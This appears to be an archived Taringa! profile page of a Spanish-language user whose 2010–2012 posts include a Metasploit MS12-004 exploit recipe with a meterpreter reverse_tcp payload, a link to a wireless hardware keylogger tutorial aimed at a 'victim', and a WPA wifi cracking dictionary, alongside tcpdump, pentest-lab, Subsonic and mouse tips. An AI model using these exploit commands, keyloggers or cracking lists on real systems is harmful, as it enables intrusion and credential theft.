C

CodigoMalicioso

Usuario (Argentina)

Primer post: 9 dic 2010Último post: 6 ago 2012
7
Posts
561
Puntos totales
1142
Comentarios
[Tuto - pdf] Keylogger por hardware (inalambrico)
[Tuto - pdf] Keylogger por hardware (inalambrico)
Apuntes Y MonografiasporAnónimo8/30/2011

Aca les dejo un link de un pdf, es un tuto muy completo para crear tu propio keylogger por hardware, seria una especie de extensión del cable del teclado que va registrando los datos ingresados. Yo aun no lo intente por falta de tiempo, pero este año si o si quiero intentarlo.El tutorial explica como crear un receptor que es el que se conecta al teclado de la victima y un receptor que es que va a ir recibiendo las teclas que se ingresen, obviamente vamos a tener que crear PCB (placa con circuitos y componentes electronicos), por lo que se mete en terrenos jodidos, pero lo explica bastante bien y a mi entender es algo mas que interesante. Disfrutenlo. Si algun link está caido busquenlo en la pagina de la fuente.

20
5
Diccionario de 33GB para fuerza bruta
Diccionario de 33GB para fuerza bruta
LinuxporAnónimo7/25/2012

Hola gente, aca les acerco un diccionario de 33GB hecho por la gente de "The Renderlab" ideado para crackear contraseñas de redes wifi con cifrado WPA/WPA2 (PSK). Sin dudas este diccionario reduce drasticamente el tiempo de crackeo, según leí hicieron una versión de 7GB que incluye 172000 palabras entre las cuales estan las 1000 contraseñas mas usadas para wifi, reduciendo el tiempo de crackeo en algunos de casos de 4hs a 10 segundos. La version de 33GB no la probé aun, con la velocidad de mi conexión probablemente se la esté descargando para que mis nietos la disfruten algún dia, pero en cuanto termine seguramente estaré haciendo un post explicando como se usa. También leí que fue muy minusiosamente diseñada buscando hasta medio millon de contraseñas en google, ademas del uso de estadisticas sobre el tema y demas, se ve prometedor. En fin, les dejo el link de donde descarga, y una nota del blog de Segu-info donde me entere de esto. Saludos

84
30
Hackaserver - prácticas de pentesting
Hackaserver - prácticas de pentesting
LinuxporAnónimo8/6/2012

Muy buenos dias a todos, hace unos dias escuche hablar de esta excelente pagina ideal para practicar el escaneo y la explotación de vulnerabilidades. Hackaserver es definitivamente una buena manera de saltar de un hacklab virtual a un escenario real de práctica. En pocas palabras, la idea es crear un server y hackearlo xD. Creo que esta imagen lo resume mejor: y cuanto hay que pagar para empezar a crear servidores? NADA!!!, solo tenes que hacerte una cuenta y empezar penetrar, si muchachos! ahora podemos penetrar gratis! xD. Les recomiendo que cuando creen su cuenta, vayan a la seccion "Training Area", arriba a su izquierda, y empiecen tratando de meterse en el que dice "Metasploitable", el primero de todos, es un clasico en la comunidad de hackaserver. Una vez que eligen un target le dan al boton "Hack it!" y descargan el archivo de configuración para establecer una conexión vpn con la victima, esto lo que hace es, en muy burdas palabras, simular que estamos en la red local de ese server, y de esa manera podemos empezar la auditoria. Para establecer la conexión, desde la consola debe poner: "sudo openvpn client.conf" donde openvpn es un programa que lo instalan desde los repositorios (sudo apt-get install openvpn) y client.conf es un archivo que está en el comprimido que se bajan desde la página. Una vez que se establece la conexión, dejan esa consola en paz a un costado y ya están en la red para empezar a hacer sus pruebas. Bueno chicas, denle gas nomas que se aprende mucho con esto. Cualquier cosa si quieren pistas para empezar a hackear el servidor "Metasploitable" me mandan MP, pero traten de darle solitos asi aprenden bien como me paso a mi. Saludos

94
7
M
Monitoreo de trafico en red: tcpdump
LinuxporAnónimo12/9/2010

tcpdump Tcpdump es una excelente herramienta que nos permite monitorear a través de nuestra preciada y querida consola de Linux todos los paquetes que atraviesen la interfaz indicada. A su vez, los múltiples filtros, parámetro y opciones que tcpdump nos ofrece, nos permite infinidades de combinaciones, al punto de poder monitorear todo el trafico completo que pase por la interfaz, como el trafico que ingrese de una ip, un host o una pagina especifica, podemos solicitar el trafico de un puerto especifico o pedirle a esta magnifica herramienta que nos muestre todos los paquetes cuyo destino sea una dirección MAC específica. Aquí algunos ejemplos: tcpdump -i wlan0 host www.google.com En este caso le decimos a tcpdump que capture y nos informe acerca de los paquetes recibidos por parte de google en la interface wlan0, pero podemos ir mas alla, por ejemplo: tcpdump -i wlan0 port not 80 and host www.google.com en este caso solicitamos aquellos paquetes que pasen por wlan0, que provengan de google pero que no pasen por el puerto 80 (el puerto del protocolo http), de manera que no se filtren los paquetes debidos al navegador y de esta manera podemos saber si san google nos envía información por algún puerto que no debería . Se imaginaran la cantidad de cosas que podemos lograr con el buen uso (o mal uso) de esta herramienta. Aquí algunos ejemplos sacados de wikipedia (mas precisamente de ACA ): Ejemplos Capturar tráfico cuya dirección IP de origen sea 192.168.3.1 tcpdump src host 192.168.3.1 Capturar tráfico cuya dirección origen o destino sea 192.168.3.2 tcpdump host 192.168.3.2 Capturar tráfico con destino a la dirección MAC 50:43:A5:AE:69:55 tcpdump ether dst 50:43:A5:AE:69:55 Capturar tráfico con red destino 192.168.3.0 tcpdump dst net 192.168.3.0 Capturar tráfico con red origen 192.168.3.0/28 tcpdump src net 192.168.3.0 mask 255.255.255.240 tcpdump src net 192.168.3.0/28 Capturar tráfico con destino el puerto 23 tcpdump dst port 23 Capturar tráfico con origen o destino el puerto 110 tcpdump port 110 Capturar los paquetes de tipo ICMP tcpdump ip proto icmp Capturar los paquetes de tipo UDP tcpdump ip proto udp tcpdump udp Capturar el tráfico Web tcpdump tcp and port 80 Capturar las peticiones de DNS tcpdump udp and dst port 53 Capturar el tráfico al puerto telnet o SSH tcpdump tcp and (port 22 or port 23) Capturar todo el tráfico excepto el web tcpdump tcp and not port 80 otra forma: tcpdump tcp and ! port 80 Capturar todo el trafico a host 10.168.1.100 puerto 80, en full verbose mode, full snap length, sin ponerla en modo promiscuo, sin convertir las direcciones de salida, imprimir en ASCII y volcar todo el dump en un file tcpdump -vvv -n -s 65535 -A -p -w /tmp/tcpdump host 10.168.1.100 and port 80 Analisis de los datos arrojados 15:23:44.772291 IP 192.168.1.17.52798 > 85.Red-83-37-170.dynamicIP.rima-tde.net.65000: . ack 1791 win 7851 <nop, nop, timestamp 5520421 997821> * 15:23:44772291: Indica hh:mm:fracciones * src: Dirección y puerto origen. * dst: Dirección y puerto destino. * flags: Flags de la cabecera TCP. (.) si no hay flags o combinación de S (SYN), F (FIN), P (PUSH), W (reducción de la ventana de congestión), E (ECN eco). * dataseq: Número de secuencia del primer byte de datos en este segmento TCP. El formato es primero:último (n). * ack: El número de asentimiento. Indica el número siguiente de secuencia que se espera recibir. * window: Tamaño de la ventana de recepción. * urgent: Existen datos urgentes. * options: Indica la existencia de opciones. Van entre "<"...">". Bueno espero que les guste, cualquier corrección o critica serán bien recibidas.

103
9
M
MS12-004 Exploit para windows
LinuxporAnónimo1/29/2012

El MS12-004 es el modulo (exploit) incluido en metasploit que explota un problema de desbordamiento (heap overflow) en la libreria winmm.dll (libreria de multimedios de windows). WTF??? en síntesis, corres el exploit, la victima ingresa al servidor que se crea y logras abrir una sesion, lo que te permite ejecutar comandos remotamente con los privilegios que tenga la victima en el momento de entrar al servidor. FECHA DEL EXPLOIT: 27/01/12 (BASTANTE NUEVITO ) Autores del exploit: Shane Garrett juan vazquez sinn3r Sistemas operativos afectados: Windows XP SP3 Windows XP Media Center Edition 2005 SP3 Windows XP Professional x64 Edition SP2 Windows Server 2003 SP2 Windows Server 2003 x64 Edition SP2 Windows Vista SP2 Windows Vista x64 Edition SP2 Windows Server 2008 for 32-bit Systems SP2 Windows Server 2008 for x64-based Systems SP2 Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1 Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1 Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1 Comandos: use exploit/windows/browser/ms12_004_midi set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit Igual que cualquier exploit de metasploit Un video de como explotan un Windows XP link: http://www.youtube.com/watch?v=TxmqMiQqCmY A mi me funciono che... ACLARACION 1: SI NO ENTENDISTE NADA, ACA TENES EL TUTO MAS COMPLETO DEL TEMA, VALE LA PENA!! http://www.metasploit-es.com.ar/wiki/index.php/Curso_de_Metasploit_Unleashed_en_Espa%C3%B1ol ACLARACION 2: LO PONGO EN ESTA CATEGORIA PORQUE ME PARECE QUE SE ADECUA MAS QUE EN LAS OTRAS En la fuente dejo el boletin oficial de windows al respecto para quienes aun no actualizaron sus servidores o clientes

95
15
[
[CentOS 6.2]Subsonic: montar servidor de audio
LinuxporAnónimo4/6/2012

En realidad seria un servidor multimedia, ya que este software tambien hace streaming de video, pero en mi caso solo lo probe para audio. Hablo de Subsonic un programa, o mas bien, un servidor que permite centralizar tus musicas para escucharla desde cualquier lado, incluso tu android, como es mi caso. Concretamente lo que queria hacer era aprovechar una Pentium 4 de 2.66ghz y 512 de ram y hacerme algun servidor (con CentOS como dios manda) que sea de ultilidad, como por ejemplo, uno para tener toda mi musica en un solo lugar y poder escucharla desde donde esté. Asi me encontre a Subsonic. La instalacion es mas que sencilla, primero debemos instalar la ultima version de java en nuestro server, para eso ponemos lo siguiente en la consola: [root@localhost subsonic]# yum install java-1.6.0-openjdk Luego se descargan el paquete, pueden ir a http://www.subsonic.org/pages/download.jsp y bajarse la version que corresponda, en nuestro caso, la version para Fedora, que obviamente tambien sirve para CentOS: [root@localhost ~]# wget http://downloads.sourceforge.net/project/subsonic/subsonic/4.6/subsonic-4.6.rpm?r=http%3A%2F%2Fwww.subsonic.org%2Fpages%2Fdownload2.jsp%3Ftarget%3Dsubsonic-4.6.rpm&ts=1333678780&use_mirror=ufpr y lo instalamos con rpm: [root@localhost]# rpm -i subsonic-4.6.rpm Y leeeesto, levantamos el servicio (si es que no se levanto solito): [root@localhost]# service subsonic start Ahora deben ingresar a un navegador e ir a http://tu_ip_local:4040 y logearnos: User: admin Pass: admin Todo se configura desde el panel que les aparece, inicialmente les va a aparecer las tres opciones que se ven en la imagen, es decir, cambiar el password, establecer cual va a ser el directorio donde va a buscar la musica el servidor, y configurar la red (no es necesario nada del otro mundo. Recuerden crear un usuario dentro de la seccion de configuracion para poder logearse desde otra terminal, como un celular, o una notebook. Para los que quieran escuchar la musica desde un android simplemente deben buscar el programa Subsonic en el market e instalarlo (tambien hay para iphone creo), una vez en el programa van a configuraciones y ponen la ip, el usuario y la contraseña correspondiente y le dan a "testear server" o algo asi para asegurarse de que anda. Tienen varios modelos para ponerle a la pagina, y obviamente, pueden escuchar musica por el navegador, como se ve en la imagen. NOTA: para poder escuchar música por 3g necesitan natear su router, osea, el mio por ejemplo es un linksys wrt56g y se hace desde "Applications and gaming", le pongo el nombre del programa (cualquiera), desde el puerto 4040 al 4040, le pongo la ip local del servidor y activo y guardo, luego reconfiguro el programa en android con mi ip publica. Si no se entiende les recomiendo buscar en google "natear + nombre de su router". Saludos

116
0
¿
¿Tu mouse va al palo?, bajale la velocidad
LinuxporAnónimo5/30/2011

... O que se creen flash. La cosa es que me compre un mouse laser barato (un Genius) que por mas que le ponia a la minima velocidad en mi Debian, andaba al palo. Despues de mucho buscar encontre la siguiente solución: 1 ) En caso de no tenerlo bajamos el xinput ("sudo apt-get install xinput" en mi caso) 2) Listamos los dispositivos de entrada detectados: xinput --list --short (Eso me aparecio a mi) 3) De la lista que dice "Virtual core pointer" hay que identificar cual es el mouse barato, adivinen cual es... 4) Ahora simplemente usamos xinput con la siguiente sintaxis: xinput --set-prop 'NombreQueFiguróArriba' 'Device Accel Constant Deceleration' X Las comillas deben ser comillas simples, la X es la velocidad del 1 al 5 siendo el 1 la mas rapida, y el NombreQueFiguróArriba es, bueno, eso, el nombre del dispositivo arrojado por el primer comando, en mi caso puse: xinput --set-prop 'Genius Laser Mouse' 'Device Accel Constant Deceleration' 2 Y me soluciono la vida. Bueno, eso fue todo, espero que les alla gustadoooooo chau. P/D 1: lo saque de acá http://debiangore.wordpress.com/2011/02/17/velocidad-y-sensibilidad-del-mouse-en-ubuntu-10-10/ P/D 2: Funciona en Debian y derivados, no me hago responsable del colapso de tu Fedora, Arch, etc. al seguir estos pasos.

49
0
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.